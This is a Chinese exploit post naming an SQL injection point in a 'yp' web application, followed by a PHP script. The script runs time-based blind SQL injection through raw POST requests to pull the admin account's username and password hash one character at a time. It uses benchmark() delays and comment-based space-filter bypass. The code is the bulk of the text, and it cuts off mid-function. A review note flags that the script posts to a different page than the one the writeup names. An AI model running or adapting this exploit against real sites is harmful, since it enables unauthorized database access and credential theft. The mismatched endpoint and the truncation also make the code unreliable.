作者:my5t3ry
注射漏洞所在处:
yp/company.php?where=%23
EXP如下(基于时间的盲注:条件为真时用 benchmark() 拖慢响应,以响应耗时判断每个字符):
<?php
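// No script time limit: every probe in exploit() deliberately waits for a
// slow server response, so a run easily exceeds the default 30 s.
ini_set('max_execution_time', 0);
// 7 == E_ERROR | E_WARNING | E_PARSE; notices (e.g. undefined variables) are hidden.
error_reporting(E_ERROR | E_WARNING | E_PARSE);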
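/**
 * Print the command-line synopsis and terminate the script.
 *
 * Reads $argv from file scope; $argv[0] is the script name. The original
 * listing had lost its line breaks, so each usage line ends with "\n" here.
 *
 * @return never
 */
function usage()
{
    global $argv;

    exit(
        '[+] Usage : php ' . $argv[0] . " <hostname> <path>\n" .
        '[+] Ex. : php ' . $argv[0] . " localhost /yp\n"
    );
}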
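/**
 * Build the URL-encoded time-based blind-injection condition for one probe.
 *
 * $prefix (table prefix of the target install) is read from file scope and is
 * not defined in this part of the listing — it must be set before the first
 * call. The sub-select always targets the first account with groupid=1,
 * presumably the admin group; confirm against the target schema.
 *
 * @param int $pos  1-based byte position (cases 1/2) or candidate length (case 3)
 * @param int $chr  ASCII code to compare against (unused for case 3)
 * @param int $chs  1 = username byte, 2 = password byte, 3 = username length
 * @return string   URL-encoded condition, or '' for an unknown $chs
 */
function query($pos, $chr, $chs)
{
    global $prefix;

    // "<prefix>member where groupid=1 limit 0,1" — shared by all three probes.
    $member = $prefix . 'member where groupid=1 limit 0,1';
    // When the condition is true the server burns CPU for a measurable time;
    // that delay is the only signal exploit() gets back.
    $delay = 'benchmark(10000000,md5(1))';

    $query = '';
    switch ($chs) {
        case 1:
            // byte $pos of the username == $chr
            $query = "1=1 and if((ascii(substring((select username from {$member}),{$pos},1))={$chr}),{$delay},1)#";
            break;
        case 2:
            // byte $pos of the password (stored hash) == $chr
            $query = "1=1 and if((ascii(substring((select password from {$member}),{$pos},1))={$chr}),{$delay},1)#";
            break;
        case 3:
            // username length == $pos; $chr is ignored
            $query = "1=1 and if((length((select username from {$member}))={$pos}),{$delay},1)#";
            break;
    }

    // Spaces become inline comments (a common space-filter bypass), then the
    // whole condition is URL-encoded for the POST body assembled in exploit().
    return urlencode(str_replace(' ', '/**/', $query));
}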
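/**
 * Send one probe to the target and decide, from response time alone, whether
 * the injected condition was true.
 *
 * The request is a raw HTTP/1.1 POST over a plain socket on port 80; header
 * lines are terminated with CRLF and a blank line separates headers from the
 * body (the original listing had lost these). The response body is discarded.
 *
 * NOTE(review): the writeup names yp/company.php?where=, but this request
 * posts to product.php with action=searchlist&where= — confirm which endpoint
 * is intended before trusting the results.
 *
 * The 4-second cutoff is arbitrary: how long benchmark(10000000,md5(1)) takes
 * depends on the target's CPU and load, so calibrate (a known-true probe
 * should clear it comfortably, a known-false one stay well under) before a
 * full run. A connection failure is reported on STDERR and counts as "false",
 * which the caller cannot distinguish from a real negative.
 *
 * @param string $hostname target host
 * @param string $path     application path on the host, e.g. "/yp"
 * @param int    $pos      see query()
 * @param string $chr      single character; converted to its ASCII code
 * @param int    $chs      see query()
 * @return bool  true when the response took more than 4 seconds
 */
function exploit($hostname, $path, $pos, $chr, $chs)
{
    // The SQL compares ascii(...) with an integer, so send the code point.
    $chr = ord($chr);

    $postdata = 'q=&action=searchlist&where=' . query($pos, $chr, $chs);

    $request  = "POST {$path}/product.php HTTP/1.1\r\n";
    $request .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $request .= "Accept-Language: zh-cn\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "Accept-Encoding: gzip, deflate\r\n";
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $request .= "Host: {$hostname}\r\n";
    $request .= 'Content-Length: ' . strlen($postdata) . "\r\n";
    // Connection: Close makes the server end the stream, which is what the
    // read loop below waits for.
    $request .= "Connection: Close\r\n\r\n";
    $request .= $postdata;

    $conn = fsockopen($hostname, 80);
    if (!$conn) {
        fwrite(STDERR, "[-] could not connect to {$hostname}:80\n");
        return false;
    }

    // Wall-clock the round trip with sub-second resolution; time() would
    // round the delay to whole seconds and blur the threshold.
    $started = microtime(true);
    fwrite($conn, $request);
    while (!feof($conn)) {
        fgets($conn, 1024); // drain; only the elapsed time matters
    }
    $elapsed = microtime(true) - $started;
    fclose($conn);

    return $elapsed > 4;
}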
function crkusername($hostname, $path, $chs)
{
global $length;
$key = “abcdefghijklmnopqrstu
